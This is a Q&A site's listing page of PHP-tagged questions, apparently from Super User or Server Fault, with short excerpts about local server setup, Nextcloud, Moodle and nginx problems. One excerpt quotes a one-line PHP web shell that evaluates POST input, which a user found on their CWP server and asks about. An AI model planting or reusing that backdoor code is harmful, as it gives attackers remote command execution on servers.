Skip to main content

Questions tagged [php]

PHP is a widely-used general-purpose scripting language that is especially suited for Web development. Questions about programming in PHP are off-topic and should be asked on Stack Overflow.

Filter by
Sorted by
Tagged with
12 votes
1 answer
1k views

I am using a cellular modem (SIMCOM A7670G) to perform HTTP 1.1 GET and POST requests to my nginx web server. GET requests are working fine, but I'm having problems with the POSTs, which are being met ...
user9819647's user avatar
1 vote
2 answers
137 views

I recently switched from Xampp (super buggy for some reason) to Laragon, and I'm trying to get my old MySQL database set up in phpMyAdmin using Laragon. I was trying to export one of my tables using ...
Boom's user avatar
  • 183
0 votes
0 answers
35 views

I am trying to configure a LAMP server on my raspberry pi 4 8gb that is currently running Raspbian. I installed PHP, mysql, PHPmyadmin and I recently set up VSFTPD to allow me to access the files ...
user avatar
1 vote
1 answer
99 views

Working on a project I am connecting API's etc to an app. I want to upload the API tokens etc outside the public_html file for maximum security, or so I've been told. However, whenever I try to upload ...
Nigel's user avatar
  • 332
1 vote
0 answers
67 views

I'm running into a strange issue with Webstorm, the Jetbrains JavaScript IDE, where it fails to highlight matching braces when I add a line of valid PHP that does not change the structure of the block....
Boom's user avatar
  • 183
1 vote
1 answer
169 views

I'm encountering a bizarre issue with a site I'm building on my XAMPP-hosted webserver. Under certain circumstances (explained below), I encounter an infinite redirect and cannot figure out what on ...
Boom's user avatar
  • 183
0 votes
0 answers
126 views

I’m setting up Moodle LMS locally on a Windows machine using XAMPP. Moodle requires HTTPS to proceed with installation, but my current XAMPP version doesn’t support HTTPS properly and uses MariaDB 10....
Kishi_Feels_Lonely's user avatar
34 votes
2 answers
5k views

On my server running CWP, I recently found a file located in /usr/local/cwpsrv/htdocs/admin/admin called error.php that just has the contents <?php @eval($_POST['shell']);?> (very concerning). ...
Bijan's user avatar
  • 655
1 vote
2 answers
339 views

I have reinstalled whole brew, installed SSL, PHP, httpd but PHP ins't interpretted. php -v returns: PHP 8.4.7 (cli) (built: May 6 2025 12:31:58) (NTS) Copyright (c) The PHP Group Built by Homebrew ...
pavel's user avatar
  • 168
0 votes
1 answer
116 views

I run a file called doskeys.cmd every time Windows Terminal opens to set amongst other things, command aliases. Should composer.json exist, I want to extract the PHP version from it so I can ...
u01jmg3's user avatar
  • 310
1 vote
1 answer
254 views

I have ASUSTOR NAS AS6302T with Nextcloud 30 installed from the App Central. I'm trying to set up cron to run background jobs. However when I try to run the cron.php script manually in the Docker ...
sulu00's user avatar
  • 21
2 votes
0 answers
662 views

I have a bare metal Nextcloud server hosted on a Debian 12 machine with a MariaDB database. When I try uploading larger files above 100M, the "estimated upload time" in the browser shows &...
Celeste's user avatar
  • 893
1 vote
1 answer
343 views

I'm using wamp on windows11 and noticed that not just the pageloads, but the CLI commands are way too slow. It seems, that something is adding a ~30s (like a timeout, not constant) to everything, but ...
V1pr's user avatar
  • 21
0 votes
1 answer
73 views

I created a container with PHP-FPM to act as the backend and admin for another PHP container. The second container will serve as the "frontend," fetching information from the first container....
Vitor de Sousa's user avatar
0 votes
1 answer
112 views

I'm asked to create an app to manage a device that's usually behind a NAT or firewall, so unreachable from the outside. Fortunately, the device's creators thought of that, so they created an API that ...
byteflush's user avatar
  • 103

15 30 50 per page
1
2 3 4 5
134